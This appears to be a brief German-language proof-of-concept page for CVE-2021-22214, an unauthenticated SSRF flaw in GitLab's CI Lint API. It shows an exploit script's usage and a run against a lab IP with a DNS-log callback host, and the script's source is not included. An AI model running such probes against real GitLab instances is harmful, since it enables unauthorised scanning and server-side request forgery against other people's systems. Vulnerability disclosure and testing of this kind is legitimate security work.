
Nicht autorisierte SSRF-Schwachstelle in der Gitlab CI Lint API (CVE-2021-22214)
Gitlab CI Lint API SSRF-Schwachstelle ohne Autorisierung (CVE-2021-22214)
Dieser Artikel und das Tool dienen ausschließlich der technischen Weitergabe. Die Nutzung für illegale Zwecke ist strengstens untersagt. Für sämtliche daraus entstehenden Konsequenzen übernimmt der Nutzer selbst die Verantwortung.
$ python3 gitlab_ssrf.py
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
Example:
python3 gitlab_ssrf.py <target> <dnshost>
Ziel: 192.168.80.136

$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.
